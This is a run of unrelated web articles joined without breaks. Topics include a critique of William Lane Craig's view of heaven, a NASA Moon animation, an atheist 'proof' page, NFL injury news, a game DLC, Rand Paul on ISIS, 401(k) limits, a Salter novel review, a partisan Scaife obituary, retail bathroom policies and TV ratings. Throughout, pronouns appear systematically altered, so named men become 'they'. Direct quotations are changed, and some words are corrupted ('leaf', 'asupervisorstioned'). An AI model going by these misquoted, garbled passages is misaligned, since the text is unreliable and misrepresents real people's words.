I would never forget that I had a child and wish to be with them in the afterlife unless God specifically altered my mind… I am just having trouble imagining myself so happy that I just don't think about my child who is burning in eternal damnation.
Craig's response begins:
You object… that God would violate the free will of redeemed persons were They to take such action. I don't see that this implication follows. God's respecting human free will has to do with moral decision-making. God will not cause you to take one morally significant choice rather than another. They leaf it up to you. But obviously God limits our freedom in many morally neutral ways… if God removes from the redeemed knowledge of the damned, including knowledge of loved ones that are damned, They do not violate the moral integrity or free will of the persons involved, any more than if They had removed their knowledge of calculus.
This is just obviously wrong. Stealing people's memories of the suffering of others is a morally neutral limitation on their freedom? By what bizarre reasoning could anyone possibly arrive at that conclusion? Taking away that knowledge stops us from acting in ways that we would otherwise want to, which is the essence of making a moral choice.
It would be as if I had a relative who was dying from cancer, and I went to see a therapist who could hypnotize me into forgetting their existence, so I wouldn't have any desire to visit them in the hospital and comfort them. By Craig's reckoning, this is a “morally neutral” choice. By any rational system of morality, however, this would be an act of supreme callousness and depraved indifference to the suffering of others.
But not to worry, Craig has a fallback answer:
This alternative suggests that the experience of being in Christ's immediate presence will be so overwhelming for the redeemed that they will not think of the damned in hell.
Craig compares this to a wounded soldier having a limb amputated without anesthetic, suffering from pain so intense it drives all other thoughts out of their mind – except, they say, we should substitute happiness for pain to get some idea of what it feels like to be in Heaven. (Great analogy!)
What this comes down to is saying that the saved will be like drug addicts on a permanent high, so wrapped up in their own euphoria that they care nothing for the world outside their own head. Heaven will be like the Land of the Lotus-Eaters from Greek mythology, its inhabitants forever smothered in a blissful haze that leaves them unable to think of or contemplate anything else, for all eternity. Am I the only one who finds this image disturbing rather than appealing?
Craig isn't the first one to suggest this; other Christians have said very similar things. But whenever they try to describe in any detail what people in this state would look or act like, they always wind up painting a picture of Kafkaesque automatons that I call bright machines. Far from being the fullest and most perfect realization of human potential, the imaginary inhabitants of Heaven are less than human. They're lacking in all the emotional depth, all the richness and color that makes our lives real and meaningful.
We do have a glimpse of this vision here on Earth. Certain kinds of brain damage can rob a person of all emotional affect, so that all they ever feel is a constant, all-enveloping bliss – very like Craig's vision of Christians overwhelmed by the beatific vision. But the result isn't an appealing picture:
“He looks like our son and has the same voice as our son, but they are not the same person we knew and loved…. He's not the same person they were before they had this stroke. Our son was a warm, caring, and sensitive person. All that is gone. They now sound like a robot.”
This, then, is the Christian conception of the afterlife – blissed-out robots in Heaven, billions of the damned eternally suffering in Hell. If that's what William Lane Craig and others want to believe, that's their right. But I would hardly call this reassuring or comforting to the worried questioner – much less a “reasonable faith”.
Other posts in this series:
Gibbous Moon, from a NASA animation.
Image credit: NASA/Goddard Space Flight Center Scientific Visualization Studio
One of the first things I do whenever I step outside—and I'm serious, I do this every single time—is look up. It's a good habit, because I always see wonderful things in the sky.
One of my favorites is the changing face of the Moon. As it swings around the Earth in its monthly orbit, the geometry between us, the Moon, and the Sun changes. The end result is the Moonscape is lit differently by the Sun every day, and we see that as the phases of the Moon. When it's between us and the Sun, we gaze upon its dark surface, and we say it's new. A week later it's lit from the side, and that's first quarter. A week after that the Sun is behind us as we look at the Moon, and it's full.
These phases are entirely predictable, along with other motions of our natural satellite. So predictable, in fact, that NASA put together this incredibly compelling video showing the Moon's motion over 2013, where each frame of the video is one hour of time! It's mesmerizing.
There's a lot to see here! First, the animation uses data from the Clementine lunar mission, a joint NASA and military probe in the 1990s to map the Moon, as well as images and topography measurements from the Lunar Reconnaissance Orbiter. The surface-elevation measurements were used to create the realistic shadows in the animation.
You probably noticed that the Moon appears to rock around, too, tipping and tilting over the course of every month. That's called libration,and is due to the Moon's orbit being elliptical, as well as the Moon's rotational axis being slightly tilted with respect to its orbit.* We see it from a slightly different angle every day, and that's what causes that apparent motion.
The video has lots of bonuses, too, like the scale on the right showing how far the Moon is from the Earth in units of the Earth's diameter (about 13,000 kilometers, or 8,000 miles). You can watch it oscillate back and forth as it orbits, moving from 28 to 32 times the Earth's diameter away.
In the lower left it shows the sub-solar point—the lunar surface directly under the Sun—which means if you were standing there (and not suffocating and/or roasting) the Sun would be exactly overhead. That graphic also shows the equator and prime meridian of the Moon, and you can watch it rock back and forth just like the big animation does.
At the bottom right is just a ton of info that changes with time, including the Moon's distance, its apparent size (measured in arcseconds, where one degree is 3,600 arcseconds; the full Moon is roughly 1,800 arcseconds, or a half degree across), what percentage of it is illuminated from our viewpoint, and so on.
I added the music. I like Kevin MacLeod's work, which they keep on their website Incompetech for use in videos like this. They take donations, I'll add.
The NASA website for the animation has a lot more information and details about the video. And bonus: Starting in 2013, the image of the Moon at the top will automatically change every hour to represent the actual view of the real Moon. That'll be fun to check! And useful, too. It's always nice to know if a thin crescent Moon awaits if I happen to step outside. That's one of my favorite sights of all.
*Correction, Nov. 25: This article originally said that libration is partially due to the tilt of the Moon's orbit with respect to the Earth's equator, but it is in fact partially due to the Moon's rotational axis being tipped with respect to its orbit.
Proof #17 - Think about Leprechauns
Many believers will say, "It is impossible for you to prove that God (Allah, Ra, Vishnu, whatever) does not exist. There is no way to prove that something does not exist." This is a silly argument for the following reason. Imagine that we have a conversation one day and I say to you, "Today I believe in the gerflagenflopple. You cannot prove that the gerflagenflopple does not exist, therefore it exists." You can see that this is ridiculous. Just because I have invented something out of thin air does not mean that its non-existence is suddenly unprovable. There has to be some evidence, or some reason, that the gerflagenflopple exists in order to assert its existence. Since there is not, it is quite easy to say that the gerflagenflopple is imaginary until such evidence is provided. We also know that the gerflagenflopple was made up on this web page. The word did not exist until created here. In this way, the gerflagenflopple is like Rudolf the Red-Nosed Reindeer: "Rudolph first appeared in a 1939 booklet written by Robert L. May and published by Montgomery Ward." We know Rudolf is fictional, and imaginary, because we can point to the fictional story that is their source. Leprechauns Now let's imagine that we have a conversation one day and I say to you, "I believe in Leprechauns. You cannot prove that Leprechauns do not exist, therefore they exist." You actually have heard of Leprechauns. There are lots of books, movies and fairy tales dealing with Leprechauns. People talk about Leprechauns all the time. Leprechauns even have a popular brand of breakfast cereal. A page like this describes/defines the traits of Leprechauns. But that does not mean that Leprechauns exist. If you read the folklore around Leprechauns, you realize that certain aspects are impossible. For example, Leprechauns are defined to be beings who keep a crock of gold at the end of a rainbow. But anyone who understands rainbows knows that there is not a geographic location associated with rainbows. Rainbows are not physical objects, but instead are optical phenomena dependent on an observer. Therefore rainbows do not have fixed X/Y locations for their ends on the ground. This is the problem with the Leprechaun legend - Leprechauns have a property that is impossible, and therefore we can say that Leprechauns do not exist. There is no "end" to any rainbow, and therefore no pots of gold located at such a point, and therefore no Leprechauns. They are as imaginary as the gerflagenflopple. Is there something that would prove Leprechauns to be real? First, we would need to change the definition of Leprechauns. We would have to drop the "pot of gold at the end of the rainbow" part of the definition, because that part is impossible. But if we do that, we are not talking about Leprechauns anymore. This is another way to know that Leprechauns are imaginary. Noah's Ark Another imaginary thing that, like Leprechauns, we hear quite a bit about in our culture is the story of Noah and their Ark. How do we know that the Noah's Ark story is imaginary? First, the story contains an element that is impossible. Genesis 7:20 says, "The waters rose and covered the mountains to a depth of more than fifteen cubits." This would mean that Mt. Everest, with a height of 29,000 feet (8,850 meters) or nearly 6 miles, was covered in water. It is impossible because that water does not exist. A planet does not magically get covered in 6 miles of water, and then have the water magically disappear.
Second, there is no evidence that the event actually occurred. And a planet-wide event of this proportion would necessarily leave incontrovertible evidence behind. There would be geological evidence, archeological evidence, ice core evidence and so on. Genesis 7:21 states: "Every living thing that moved on land perished � birds, livestock, wild animals, all the creatures that swarm over the earth, and all humankind." That would leave behind massive amounts of genetic evidence in every species, as each species narrowed to a single breeding pair. For these reasons we can easily say that the story Noah's Ark is imaginary - a fictional fairy tale. God If you think about it, you will realize that there is no difference between God and Leprechauns. Lots of people talk about God as though they exist, but there is no actual evidence for God's existence. And there should be, because there are many positive claims in the definition of God. For example: God has never left any physical evidence of their existence on earth.
All historical gods were imaginary and we know it. (see this page)
None of Jesus' "miracles" left any physical evidence either. (see this page)
God has never spoken to modern man, for example by taking over all the television stations and broadcasting a rational message to everyone.
The resurrected Jesus has never appeared to anyone in a provable way. (see this page)
The Bible we have is provably incorrect and is obviously the work of primitive men rather than God. (see this page)
When we analyze prayer with statistics, we find no evidence that God is "answering prayers." (see this page)
Huge, amazing atrocities like the Holocaust and AIDS occur without any response from God.
And so on� There is absolutely no evidence indicating that God exists. There is a tremendous amount of empirical evidence that God does not exist. For example, God is defined as a prayer-answering being, but we know with certainty that the belief in prayer is a superstition. Therefore we can conclusively say that God is imaginary. Another angle Here is a second way to look at the same question. With every other object and phenomenon in our experience, we use the scientific method to determine whether it exists or not. For example, X rays are invisible, but we know that they exist. We can devise scientific experiments to prove that they exist. Then, once proven to exist, X-rays can be used predictably in all sorts of beneficial ways. If you would like to hypothesize that God exists, then you should say to yourself, "Let's devise a repeatable scientific experiment to provide evidence that God exists." Every experiment we devise demonstrates, yet again, that God is imaginary. This page provides a simple example of such an experiment - if God were real, we should be able to have them to appear as described in the Bible. Isn't it odd that God, unlike everything else in our universe, has been put into a special category? When we talk about God, we are supposed to do so "philosophically." Why? Why not treat God just like all other objects and devise experiments to detect their presence or absence? The classic religious response is, "God must remain hidden. If they proved their existence, that would take away faith." This is clever -- here we have an object named God that proves its existence by completely hiding its existence. Of course, in the real world, any object that provides no evidence for its existence is classified as imaginary. Even more interesting, this object called God, which is supposedly hiding its existence completely, is in the meantime supposedly writing books, answering prayers and incarnating itself. How can that be? This obvious contradiction shows how imaginary God is. When we look at prayer scientifically, we find that "answered prayers" are actually nothing but coincidences. When we look at the Bible scientifically, ethically or rationally, we find that the Bible is wrong. When we look at all of Jesus' miracles scientifically, we find that none of them left behind any scientific or historical evidence. Nor, for that matter, did Jesus, nor did Jesus' resurrection. Strangely, not a single historical source independent of the Bible ever mentions the resurrection. There is a famous saying: "Absence of evidence is not evidence of Absence." And that is true sometimes. But in many cases the statement is not true. As we saw with Noah's Ark, the event would have necessarily left evidence behind in many different forms and places. Therefor, the absence of evidence is evidence of absence in this case. God suffers from the same type of problem. God is defined, for example, as a prayer answering being. We can easily demonstrate that the belief in prayer is a superstition. That contradiction shows God to be imaginary. The reason why we can find no empirical evidence for God's existence is not because "God is a magical being completely able to hide from us." It is because God is imaginary. <<< Proof #16 | Home | Go to Proof #18 >>>
Quarterback Colt McCoy played in five games this season, but will miss the final two because of a neck injury. (Ricky Carioti/The Washington Post)
Updated, 3:33 p.m.:
Colt McCoy said they knew he'd aggravated their sprained neck the moment they were tackled on the opening series of Sunday's game against the New York Giants.
After a battery of tests Monday confirmed that the only remedy was rest, Washington placed McCoy on injured reserve for the balance of the season, bringing an end to the career resurgence the 28-year-old had only begun to craft.
Speaking to reporters Tuesday, McCoy seemed to be working hard to hold their emotions in check, calling the setback “a hard pill to swallow.”
“I'm pretty emotional about it because I do feel comfortable here,” said McCoy, who'd vaulted from third-string quarterback to starter this season and held out of hope of halting Washington's five-game losing streak when they re-injured their neck Sunday. “I know that [Coach] Jay [Gruden] and [offensive coordinator] Sean [McVay] and I see eye to eye on a whole lot of things. We see the field the same way. I felt like there was a lot of positive things ahead for me. I'm not saying there isn't still. I'm just frustrated I'm not going to be able to finish the season out with my teammates — finish strong, like our goal was.”
Robert Griffin III stepped in with Washington leading 3-0 at that point, but the Redskins suffered their sixth consecutive defeat, 24-13.
Redskins Coach Jay Gruden said the team wouldn't sign a third quarterback for the two games that remain, choosing instead to elevate linebacker Jackson Jeffcoat from the practice squad to the extra roster spot. With McCoy on injured reserve, that assures Griffin of starting the final two games of the season, barring injury. Kirk Cousins becomes the team's No. 2 quarterback.
McCoy said they intend to stay with the team for the balance of the season, taking part in quarterback meetings as customary and being available on the sideline to help Griffin and the offense any way I can.
“Jay wants me around,” McCoy said. “I'm going to give everything I can to help Robert be the best they can be, help our team. Love to find a way to win these next two weeks. I'll continue to be a great teammate. I definitely don't want to leave. I want to be a part of it. I feel like I can make a difference.”
A third-round draft pick in 2010 (85th overall), McCoy signed a one-year, $795,000 deal with the Redskins on April 3 after spending 2013 backing up Colin Kaepernick at San Francisco. They had spent their first three seasons with the Cleveland Browns.
McCoy said he'd like to return to the Redskins next season, given their comfort and familiarity in Gruden's offense.
McCoy finishes the season with a 96.4 passer rating, currently the highest among Washington's quarterbacks. They completed 91 of 128 throws for 1,057 yards, four touchdowns and three interceptions.
They also rushed 16 times for 66 yards.
Most notably, McCoy engineered the only quality win to date in Washington's 3-11 season, leading the team to a 20-17 overtime upset of the Cowboys at Dallas. But they didn't get a chance to build on that victory, restored to backup status once Griffin fully recovered from the dislocated ankle they suffered in Week 2.
Griffin struggled, however, and was benched in favor of McCoy after their third consecutive loss as a starter.
With four games remaining and the offense in their hands, McCoy had finally reached the spot he'd been striving for the past several years.
But they sprained their neck in the fourth quarter against St. Louis. Though cleared to return for last Sunday's game against the New York Giants, McCoy re-aggravated the injury when tackled on a four-yard scramble on the first series.
Original post, 2:50 p.m.:
During their regular meeting with reporters after Tuesday's practice, Jay Gruden said quarterback Colt McCoy is finished for the season.
Mike Jones tweeted the news, and will follow shortly with a more thorough report. Here are McCoy's stats this season.
Mccoy on IR and Jackson Jeffcoat on 53 — Mike Jones (@MikeJonesWaPo) December 16, 2014
Gruden says it's probably too late to bring in another qb. — Mike Jones (@MikeJonesWaPo) December 16, 2014
Mccoy said no longterm damage from their injury. Just needs rest. Very disappointed obviously. — Mike Jones (@MikeJonesWaPo) December 16, 2014
McCoy: "I'm very emotional about it because I'm very comfortable here and feel Jay, Sean and I see eye to eye on a lot of things." — Mike Jones (@MikeJonesWaPo) December 16, 2014
McCoy says they will be a good teammate and do what they can to help Griffin get better. — Mike Jones (@MikeJonesWaPo) December 16, 2014
Redskins have announced they're placing Colt McCoy on the injured reserve list. Their season is over with two games left. — MarkMaske (@MarkMaske) December 16, 2014
No Colt McCoy @ #Redskins walk through today; RG3 and Kirk Cousins throw to each other pic.twitter.com/UqLJ4nSnSG — Liz Clarke (@lizclarketweet) December 16, 2014
More from The Post:
Mailbag: Gruden's future, Griffin's to-do list | Gruden turns to Griffin
Bog: How Gruden discusses QBs | Analyst calls Griffin drama king
Fancy Stats: Fans starting to dislike Gruden as much as Snyder
Power rankings: Maske has Pats No. 1 | Greenberg has Redskins last
More NFL: Home page | Sports Bog | Early Lead | Fancy Stats | Fantasy
Follow: @MikeJonesWaPo | @lizclarketweet | @JReidPost | @Insider
System Rift, the first of two Deus Ex: Mankind Divided “story DLCs” included with the game's season pass, is now live on Steam. The expansion reunites Adam Jensen with their former Sarif compatriot Frank Pritchard, who needs help breaking into one of the most secure databanks ever created. Naturally, this isn't just your garden-variety high-tech B&E: “In agreeing to help, Adam may also be able to uncover hints as to who the Illuminati really are.”
Side-by-side with the expansion, Eidos Montreal has also released a new Mankind Divided patch that fixes a few bugs, improves Tobii EyeTracking support, and adds a lens flare option. DirectX 12 support is still being worked on, and remains available through the DX12_preview branch. Instructions on accessing it, and notes on why you might (and might not) want to do so, are available on Steam.
If you don't happen to own the Deus Ex: Mankind Divided season pass, System Drift will set you back $12/£9.50.
Sen. Rand Paul Randal (Rand) Howard PaulThe Hill's Morning Report — Emergency declaration to test GOP loyalty to Trump The Hill's 12:30 Report: Trump escalates fight with NY Times The 10 GOP senators who may break with Trump on emergency MORE (R-Ky.) said Wednesday night that, though they support “doing whatever it takes” to address the growing terrorist threat in the Middle East, the U.S. should be wary its actions don't create further unrest.
Paul suggested it was, in fact, U.S. efforts to topple secular dictators in the region that led to the rise of Islamic extremist groups.
“While I do support doing whatever it takes to take out ISIS, we need to remember why we got here. And the reason we got here is because we took it upon ourselves to topple secular dictators who are enemies of radical Islam,” they said, naming ex-Libyan strongman Moammar Gadhafi, former Egyptian President Hosni Mubarak, Syrian President Bashar Assad ("maybe") and former Iraqi President Saddam Hussein.
"We did allow a festering of chaos, when we toppled the secular dictators," Paul said.
It was a return to the more isolationist tone that Paul, a leader in the libertarian movement, had typically been known for. They surprised many supporters when they came out in support of military action against the Islamic State in Iraq and Syria (ISIS).
Paul's remarks followed shortly after President Obama's address to the nation laying out their plans to tackle the threat posed by ISIS fighters.
The Kentucky Republican faced pushback from Fox News host Sean Hannity, who argued it was the U.S.'s premature withdrawal from Iraq that caused the unrest in the Middle East.
But Paul said, “there is an argument to be made that Iraq is not really a country” and so attempting to stabilize it was futile.
“Yes, leaving troops might have helped stability, but it might also be that countries like Iraq and Afghanistan are not real countries and will devolve into tribal warfare, no matter how long we stay,” they said.
And unlike Sen. Ted Cruz, (R-Texas), a fellow potential presidential contender who spoke before Paul on Fox and roundly criticized the president, Paul seemed to find some agreement with Obama.
Like Obama emphasized in their remarks, Paul argued that ISIS is not a “true” form of Islam.
“The ultimate war, the long war, whoever knows how long, ultimately is going to need allies from civilized Islam. So, I think it is important not only to the American public, but for the world and for the Islamic world to point out that this is not a true form of Islam,” they said.
“This is a barbaric form that should not represent most of the civilized Islamic world.”
Those comments were met with criticism from conservatives on Twitter, who were surprised the senator found common ground with the president.
Paul also called for the Islamic world to “step up” to combat radical Islam extremists.
But they offered sharp criticism of the president's declaration that they would launch a military effort without seeking congressional approval if they have to.
“It isn't the constitutional way,” Paul said. “It is unconstitutional, what he's doing.”
Super savers and rich people will be able to put even more money in their 401(k)s next year.
Starting in 2015, contribution limits for the tax-deferred retirement accounts will increase by $500 to $18,000, the Internal Revenue Service announced Thursday.
Meanwhile, the "catch-up" amount that workers age 50 and over can contribute to their plans will rise to $6,000 from $5,500, for a total of $24,000 next year.
Of course, not many workers can afford to save those maximum amounts. In 2013, 12% of Vanguard's more than 3 million 401(k) participants contributed the max allowed (not including any match from their employer), according to the company's annual How America Saves report.
Vanguard's report found that 36% of 401(k) savers earning $100,000 or more contributed the max, while only 2% of those earning between $50,000 and $74,999 maxed out their contributions.
Calculator: Will you have enough to retire?
Stephen Blakely from the Employee Benefits Research Institute noted that some people may not be able to contribute the maximum savings because their employer limits how much they can put in a 401(k).
The IRS said it was increasing the 401(k) contribution limits to reflect increases in the Consumer Price Index, which measures inflation. Yet the agency said the price increases were not enough to merit raising the contribution limits for traditional and Roth IRAs, which will remain unchanged at $5,500. The IRA catch-up contribution of $1,000 will also stay the same.
However, the IRS is raising the income levels that determine who can get a full deduction on their IRA contributions.
In 2015, the deduction will phase out for single taxpayers who also have a workplace retirement plan, like a 401(k), with an income of between $61,000 and $71,000, up from $60,000 to $70,000. For joint filers where the spouse making the IRA contribution also participates in a workplace retirement plan, the deduction will phase out at incomes of $98,000 to $118,000, up from $96,000 to $116,000.
Related: Social Security benefits to increase by 1.7% in 2015
More people will also be able to contribute to a Roth IRA, which allows after-tax contributions.
For 2015, single taxpayers earning less than $131,000 can put money into a Roth account, up from $129,000 this year. And those earning less than $116,000 (up from $114,000 this year) can make a full $5,500 contribution. Meanwhile, married couples filing jointly can contribute to a Roth if they earn less than $193,000, up from $191,000. And they can make the full contribution if they earn less than $183,000, up from $181,000.
It will also be slightly easier for taxpayers to qualify for the so-called savers credit of up to $2,000, which is aimed to help low- and middle-income retirement savers. In 2015, the credit will be granted to married couples with income of less than $61,000 and single filers with incomes less than $30,500.
Going long where those previous narratives were almost cruelly terse, “All That Is” gobbles the whole arc of a man's lifetime as its subject, opening near the end of World War II, when Philip Bowman is a junior naval officer on a ship bound for Japan. Over the next several decades, we see them married and divorced, and watch them make their way as a book editor at a literary publishing house in New York. Other romances follow, the most significant one curdled by a cruel betrayal that Bowman ultimately repays with commensurate viciousness. Friends fall away, new friendships are forged, houses are bought and sold, parents die, and one by one the bonds of love and attachment weaken and fade. In one of our last glimpses of Bowman — he's just old enough to be thinking hard about death — he's pondering a trip back to the Pacific, last seen from a warship's deck, “where the only daring part of their life lay.” The clock ticks in this book too, but not so audibly, and sometimes not at all.
Set beside the flyboys and climbers of Salter's previous books, Bowman looks unremarkable, a loner with a lowercase life and a profession to match: “The power of the novel in the nation's culture had weakened. It had happened gradually. It was something everyone recognized and ignored. All went on exactly as before, that was the beauty of it. The glory had faded but fresh faces kept appearing, wanting to be part of it, to be in publishing which had retained a suggestion of elegance like a pair of beautiful, bone-shined shoes owned by a bankrupt man.” Here, as always, this writer so at war with the obvious uncovers radiance in even the most melancholy circumstance, applying to it the same rigor they use to scrutinize and dismiss any easy, conventional notions about heroism or the honorable life.
What redeems the otherwise ordinary Bowman — what gives them grace — are their unstinting capacity for watchfulness and their embrace of memory as a bulwark against oblivion. Supplying their own epigraph, Salter opens the novel with this note: “There comes a time when you realize that everything is a dream, and only those things preserved in writing have any possibility of being real.” Bowman insists at one point that he's no writer, but, like the man who created him, they don't miss much: “The first voice they ever knew, their mother's, was beyond memory, but they could recall the bliss of being close to them as a child. They could remember their first schoolmates, the names of everyone, the classrooms, the teachers, the details of their own room at home — the life beyond reckoning, the life that had been opened to them and that they had owned.”
With their customary knack for scenes and characters chiseled with a stonecutter's economy, Salter constructs Bowman's world out of dozens of glistening miniatures and tossed-off portraits, each bristling with life. There are the troops at Tarawa, “slaughtered in enemy fire dense as bees,” and Bowman's uncle, a New Jersey restaurant owner who “had taught themselves to play the piano and would sit in happiness, drawn up close to the keyboard with their thick fingers, their backs richly haired, nimble on the keys.” There is an upper-crust London party that might have been drawn by Hogarth, where an “older woman with a nose as long as an index finger was eating greedily, and the man with them blew their nose in the linen napkin, a gentleman, then.” (Actually, the artist Salter most closely resembles is Degas, with their icy regard and discerning, sensual eye.) And while there is a generous amount of carnality, as might be expected from the author of “A Sport and a Pastime,” the sex is always lyrically economical and never ever laughable, except when it means to be: “They made love simply, straightforwardly — they saw the ceiling, they the sheets.”
The everyday may be one of the hardest things to write about — the quotidian doings, including the outright tedium, of ordinary life. Writers from Flaubert to David Foster Wallace have attempted it, and its difficulties may be gauged by the fact that only writers of that caliber even consider trying. But to pull it off, to succeed in conjuring the “unbreathing stillness” of an August dawn just before a storm or the vertigo ignited by the news of a mother's death, to indelibly record the trivial and the portentous with the same ravenous affection, thereby persuading us that there may be no difference between the two when assaying the worth of a life or divining its mystery — that is a crowning achievement and it's Salter's to claim.
Richard "Dickie" Mellon-Scaife the reclusive billionaire publisher and heir of the 19th century Mellon Bank robber barons died at 82 on Friday, the final punctation of a dark biography of political manipulation and democracy demolition equal or greater to their more public friends the Koch brothers.
Scaife's history in American politics has always gravitated to the most extreme of conservative politics. Dickie:
Backed Senator Barry M. Goldwater, the extremist Arizona Republican who lost their presidential race in a landslide in 1964.
Gave a million dollars to the Committee To Re-Elect the President (CREEP), for President Richard M. Nixon. $45,000 of that was connected to a secret fund linked to the Watergate scandal.
A big backer of Ronald Reagan and the radical right infrastructure that was launched in their presidency;
Backed anti-immigrant organizations and political movements.
Funded the Gen. Westmoreland lawsuit against CBS to break down the strong 4th estate news division created by CBS founder William Paley.
Scaife, the Kochs and others launched a decades-long programs to develop a vast radical-right infrastructure.
They spent billions to breed a new generation of ignorant warrior-candidates, to break down American journalism's watchdog role over government, and to politiform the sociopolitical landscape of the United States back into their limited 19th century world view of an America where women, minorities, and the working classes are subservient to the will of that 1% white right minority.
It is that ground came that erupted as the Tea Party in 2010, and has made that sect of the GOP politically mighty even as membership in the Republican Party has declined to historic lows.
Scaife is identified as a publisher, but most of their personal wealth, according to Forbes in March of 2013, some $1.4 billion, comes from the diversified family holdings in oil, aluminum, real estate and banking.
The family's great wealth comes from their great-uncle, Andrew Mellon, who amassed a fortune as banker to the Robber Barons. Their father Alan married Sarah Mellon and their fortune.
It is their control of mother Sarah's sizable "charitable" foundations that has bankrolled much of Mellon-Scaife's political activity.
They controlled three big far Right funders:
The Sarah Scaife Foundation;
The Carthage Foundation;
The Alleghany Foundation
The Scaife Family Foundation (Until 2001. After that it was passed to their daughter and son, Jennie and David.
Scaife and their family's charitable foundations have given over $1 billion to right-wing organizations over decades, and was key in the creation of a far right infrastructure designed to destroy the New Deal America that sent their family and the other empire builders of the 19th century into the shadows after the Great Depression.
The Washington Post noted back in the Clinton era:
"Together these groups constitute a conservative intellectual infrastructure that provided ideas and human talent that helped Ronald Reagan initiate a new Republican era in 1980, and helped Newt Gingrich initiate another one in 1994. Conservative ideas once dismissed as flaky or extreme moved into the mainstream, and as the liberal National Committee for Responsive Philanthropy concluded in a recent report, "The long-standing conservative crusade to discredit government as a vehicle for societal progress has come to fruition as never before."
According to PRWatch, Scaife and the family foundations have worked hard to kill immigration reform and to fund anti-immigrant groups.
They donated more than $4 million to the Federation for American Immigration Reform (FAIR) and more than $3 million to the Center for Immigration Studies (CIS) since the early 1990s. Since 2001, the foundations have given ProEnglish $285,000 and NumbersUSA $987,500. The Scaife Family Foundation is also the sole funder of ProEnglish.
Scaife was rabidly anti-Clinton, spending millions to discredit him, and keep their administration from undoing any of the damage to New Deal government done over the Reagan years.
Dickie gave a $3.2 million grant to the American Spectator and then an additional $2.3 million specifically to fund the "Arkansas Project" to find dirt on the Clintons or manufacture it in order to smear them, in hopes of ousting President Clinton from the White House, that was alleged to have transgressed into witness tampering.
On the legal front, they were a funder of Judicial Watch and their right wing propaganda outlets trumpeted the call to end "judicial activism," even though, as we have seen, appointees to the SCOTUS whom they endorsed have engaged in quite a bit of "activism" in favor of Mellon-Scaife's political philosophy.
Perhaps Mellon-Scaife's greatest legacy in the undermining of American democracy is the extensive damage that they have done to American journalism. They bought into the publishing world, buying the newspaper that became the Pittsburgh Tribune Review, and the Sacramento Union. They were a funder of special projects for the American Spectator. With Rupert Murdoch, they launched extensive campaigns at labeling and branding the media as being too liberal.
They reportedly funded the 1985 libel lawsuit against CBS News by Gen. William Westmoreland over the documentary "The Uncounted Enemy," which claimed that Westmoreland deliberately underestimated enemy troop strength in Vietnam.
Their print and radio empire, along with Murdoch's used the 9-11 tragedy and the roll out of the Iraq War as a means of casting doubt on the "loyalty" of organizations like the New York Times. Juan Cole, a University of Michigan history professor, said "Rupert Murdoch, and Richard Mellon Scaife, and other far rightwing billionaires have deeply corrupted our information environment. They are in part responsible for what happened at the NYT."
Recognizing the growing importance of the Internet for news, they invested in the fledgling right-wing web newser NewsMax.com.
In the publishing world, it has been alleged that they are one of the right-billionaires buying up conservative books to turn them into best sellers. Sarah Palin's authorial prowess may have been influenced by Scaife's wholesale purchase of millions of dollars in books.
Richard Mellon-Scaife leaves this life with a legacy opposing social justice, breeding fear of immigrants and a hatred of government and the media, the only purpose of which is the desperate attempt to turn the clock back to an America that their family ruled without compromise.
Given that the fountainhead of money from the foundations which they controlled remain beyond their time on this Earth, it is unlikely that their family will do much less than continue their mission to bring the 21st century in line with the 19th.
Though it was the first to publicly state its stance on full trans-inclusion in public bathrooms, Target is now being joined by other retailers who are starting to weigh in on the question of trans rights.
Early last month, in the face of anti-LGBT legislation out of North Carolina and Mississippi, Target released a statement affirming its commitment to allowing trans people to use whatever bathroom makes them feel comfortable.
Though many praised the announcement, some customers, spurred on by the conservative hate group American Family Association, vowed to boycott the store until it changed its policy. Now, other brands have begun to voice their opinions on the matter.
Starbucks, Hudson's Bay Co.—parent company to Lord & Taylor and Saks Fifth Avenue—and Barnes & Noble have all come out in support of trans people's rights to use the bathrooms that best align with their gender identities.
Representatives from the three companies shared their bathroom policies with USA Today.
“HBC respects and affirms each person's right to self-identify and access facilities that reflect their gender identity,” said spokesperson Tiffany Bourré.
Starbucks spokesperson Jaime Riley stated that the company is “looking into additional opportunities to have more gender-neutral signage in our restrooms where jurisdictions allow it.”
“As a company, Barnes & Noble treats all employees and customers with dignity and respect,” spokesperson Mary Ellen Keating said. “For our transgender employees and customers, that means that they are allowed to use the bathroom of the gender they identify with.”
As of this writing, none of the asupervisorstioned companies have commented on the petition launched at Target.
It's no secret that beauty standards change culture by culture, but what exactly changes as the “ideal body” moves around the globe?
That's the question a U.K.-based group set out to seek. They took an image of a man in their skivvies and sent it out to get doctored into the ideal version.
Related: Here's How The Male Standard Of Beauty Changes Around The World
Takeaways? The U.S. really like 6-packs (no surprise there), Russia is all about this pecs, and some people really need to learn better photoshop skills. A few of the results are a bit off-putting (China, South Africa), not because of the beauty standards but because of some shoddy editing.
Also, Serbia liked the original guy just fine, they just needed some arm ink. Who knew?
Take a look below:
via Cosmo
Harry Belafonte is 86, an age that tends to focus the mind on putting one's affairs in order. And that is why, Mr. Belafonte says, they have filed a lawsuit in federal court against the three surviving children of one of their closest friends: the Rev. Dr. Martin Luther King Jr.
At issue are three documents that used to be in Mr. Belafonte's collection of memorabilia, along with other photos and letters on the walls of their apartment, chronicling their long friendship with Dr. King. Mr. Belafonte says the papers were given to them by Dr. King himself; by their widow, Coretta Scott King; and by Dr. King's close aide Stanley Levison.
Dr. King's heirs — Dexter, Bernice and Martin Luther King III — have said the documents were taken without permission and belong to the estate.
Mr. Belafonte, who often supported the King family financially during the civil rights struggle, said the dispute pains him. They said in their view, Dr. King's children had drifted away from their father's values. “The papers are symbolic,” they said. “It's really about what happened to the children, and I feel that somewhere, in this one area, I really failed Martin.”
Click Here for More Articles on RATINGS WATCH
CBS won the week in viewers while all three premieres of BIG BROTHER finished among the top 10 broadcasts in adults 18-49, according to Nielsen live plus same day ratings for the week ending June 26.
CBS has 11 of the top 20 broadcasts including all three editions of BIG BROTHER, the series finale of PERSON OF INTEREST and rebroadcasts of the Network's top dramas and comedies.
Among adults 18-49, BIG BROTHER WEDNESDAY (1.9) placed third for the week, while BIG BROTHER THURSDAY (1.7) was tied for fifth and BIG BROTHER SUNDAY (1.6) was tied for seventh.
...CBS Broadcasts In Top 20 (Live+SD):
#4 - 60 MINUTES-R (7.6m)
#5 - THE BIG BANG THEORY-ENCORE (7.2m)
#8 - NCIS-ENCORE (6.6m)
#10 - PERSON OF INTEREST (6.5m)
#11 - BIG BROTHER-WED Season Premiere (6.2m)
#12 - NCIS: NEW ORLEANS-R (6.1m)
#13 - BLUE BLOODS-R (5.8m)
#14 - BIG BROTHER-THU Season Premiere (5.7m)
#15 - BIG BROTHER-SUN Season Premiere (5.5m)
